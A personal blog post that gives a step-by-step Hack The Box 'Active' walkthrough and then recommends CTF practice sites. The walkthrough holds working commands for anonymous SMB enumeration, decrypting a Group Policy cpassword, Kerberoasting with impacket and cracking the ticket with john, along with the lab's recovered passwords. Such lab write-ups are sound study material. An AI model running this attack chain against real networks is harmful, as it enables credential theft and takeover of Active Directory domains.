Hack the Box “Active” Walktrough/Writeup

I’ve been playing with htb / Hack The Box for a little while, but I often stumble upon something that gets me stuck.

But this one in the Active Directory 101 path with the name Active is my first one “without” help.

First I did my usual nmap.

nmap -sV --script vuln 10.129.207.101


Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 08:36 BST
Nmap scan report for 10.129.207.101
Host is up (0.051s latency).
Not shown: 983 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-10-25 07:36:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

I then edited my host file to link the IP to the domain active.htb.

nano /etc/hosts

After that I did some usual smbplay, and ended up with some nice files containing a username and something called cpassword.

smbclient -L 10.129.207.101
Enter WORKGROUP\htb-dr3as's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available

smbclient \\\\10.129.207.101\\Replication
Enter WORKGROUP\htb-dr3as's password:
Anonymous login successful

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml


active.htb\SVC_TGS edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

I had to google what I’m able to to with the cpasssword, and gpp-decrypt was the first hit.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

I then tried with smbclient again, this time with username and password, and there the userflag was.

smbclient -U active.htb\\SVC_TGS \\\\10.129.207.101\\Users
Enter ACTIVE.HTB\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \>

smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

With this user I also was able to use the GetUserSPNs script from impacket to get the administrators password.

impacket-GetUserSPNs -request -dc-ip active.htb active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

john --wordlist=/usr/share/wordlists/rockyou.txt GetUserSPNs.out

Ticketmaster1968

And yet again there was some smb to get the rootflag.

smb: \Administrator\Desktop\> get root.txt

CTF’s

security logo
Photo by Pixabay on Pexels.com

When I started to work with infosec I tried a lot of different ways to learn new stuff. I took some courses, read books, watched videos, etc.

But to learn new things, with some help on the way I found out that playing CTFs is a great way. These websites make hacking into a game, by giving you systems to play with, and your job is to get the token(s).

It may be a website you have to get access to, a windows server with vulnerable samba, or maybe a router with a default username/password combination. Some of the sites often have walkthroughs you can look at if you are stuck, and they are great for learning. But remember, DO EVERYTHING yourself as well, that’s the way you learn. Another important thing to remember is that these techniques should only be used on testing like this, using it in the wild may be illegal.

Well enough chatting about, here is my list of some great CTF sites.

  • hackthebox The one I pay for atm, mostely because of great labs, and the Parrot OS you get access trough your webbrowser(a great way to make your self safe)
  • tryhackme Have some great intro tutorials.
  • picoctf For people from the age of 13 and up. But dont get fooled, some of them are real hard. Free